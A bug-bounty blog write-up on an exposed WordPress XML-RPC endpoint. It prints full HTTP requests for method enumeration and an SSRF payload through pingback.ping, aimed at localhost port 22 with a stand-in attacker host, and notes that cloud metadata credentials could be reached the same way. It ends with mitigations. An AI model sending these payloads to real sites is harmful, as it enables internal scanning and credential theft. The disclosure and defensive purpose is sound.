Nextcloud disclosed on HackerOne: xmlrpc.php is enabled - Nextcloud

Hi Nextcloud Team, Summary: An attacker can devise a XML request to list all the methods that are enabled on the…

hackerone.com

While testing for common vulnerabilities in WordPress installations, I found an exposed XML-RPC interface that enabled me to perform method enumeration and server-side request forgery (SSRF) β€” resulting in a $$$ bounty. In this blog, I'll explain how this happened and why this issue is more dangerous than it seems.

🧠 What is XML-RPC in WordPress?

XML-RPC is a feature that allows remote access to WordPress. It's commonly used by mobile apps and third-party tools like Jetpack or blogging clients. The endpoint is typically located at:

https://example.com/xmlrpc.php

Unfortunately, many site owners leave this feature enabled even when it's not required, exposing powerful internal methods to unauthenticated users.

πŸ”Ž Vulnerability Summary

None

The following issues were observed on the WordPress site hosted at https://example.com:

  • Unauthenticated access to system.listMethods, revealing all supported XML-RPC functions.
  • SSRF via pingback.ping, allowing the server to make arbitrary HTTP requests.

⚠️ Affected Endpoint

https://example.com/xmlrpc.php

πŸ“Œ Vulnerability 1: Method Enumeration via system.listMethods

I first tested if the XML-RPC API was publicly accessible. By sending a simple XML payload using the system.listMethods call, I was able to list all methods supported by the server β€” including plugin-defined ones.

πŸ”§ Request:

POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Type: text/xml
<methodCall>
  <methodName>system.listMethods</methodName>
</methodCall>This response showed that several methods were enabled, including pingback.ping, which is known for SSRF potential.

πŸ“₯ Response:

None
<methodResponse>
  <params>
    <param>
      <value>
        <array>
          <data>
            <value><string>system.listMethods</string></value>
            <value><string>system.multicall</string></value>
            <value><string>pingback.ping</string></value>
            <value><string>wpcom.mobile_push_win_phone_get_last_notification</string></value>
            ...

This response showed that several methods were enabled, including pingback.ping, which is known for SSRF potential.

🚨 Vulnerability 2: SSRF via pingback.ping

The pingback.ping method is meant to notify a site that it's been linked to. However, it can be abused to make the WordPress server initiate HTTP requests to arbitrary URLs, including internal IPs.

πŸ§ͺ Exploit Request:

POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Type: text/xml
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://127.0.0.1:22/</string></value></param>
    <param><value><string>https://attacker.example.com/post</string></value></param>
  </params>
</methodCall>

🧯 Response:

<fault>
  <value>
    <struct>
      <member>
        <name>faultCode</name>
        <value><int>0</int></value>
      </member>
      <member>
        <name>faultString</name>
        <value><string>Invalid discovery target</string></value>
      </member>
    </struct>
  </value>
</fault>

Even though the request failed due to backlink validation, it confirmed that the WordPress server attempted a connection to 127.0.0.1:22 β€” proving SSRF functionality.

🎯 Potential Impact

This vulnerability has wide-reaching consequences:

  • πŸ” Internal Port Scanning: Identify open services (e.g., Redis, SSH) on localhost or internal networks like 192.168.0.0/16.
  • 🌐 Metadata Service Access: Target http://169.254.169.254/ to extract cloud instance data (e.g., AWS EC2 credentials).
  • βš™οΈ Chained Exploits: Combine SSRF with insecure plugins to achieve Remote Code Execution (RCE).

πŸ›  Recommendations

βœ… Disable XML-RPC if unused:

Add this line to your functions.php:

add_filter('xmlrpc_enabled', '__return_false');

Or block it via .htaccess:

<Files xmlrpc.php>
  Order Deny,Allow
  Deny from all
</Files>

πŸ”’ If XML-RPC is needed:

  • Block dangerous methods like pingback.ping and system.multicall via a WAF or security plugin.
  • Restrict access to authenticated users where possible.
  • Monitor for repeated XML-RPC traffic in logs.

πŸ† Reward

This bug was submitted through a responsible disclosure program and rewarded with $$$. Even though this was a fairly common misconfiguration, the presence of SSRF made it impactful.

✍️ Final Thoughts

WordPress sites often expose more than they should. Even basic methods like pingback.ping can open the door to serious internal attacks. Always scan for legacy APIs, especially if you're doing reconnaissance or pentesting.